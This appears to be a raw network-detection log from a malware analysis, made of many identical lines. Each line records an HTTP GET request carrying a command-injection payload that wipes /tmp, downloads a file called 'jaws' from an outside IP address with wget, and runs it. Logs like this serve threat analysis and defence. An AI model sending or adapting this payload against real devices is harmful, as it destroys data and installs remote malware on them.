Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
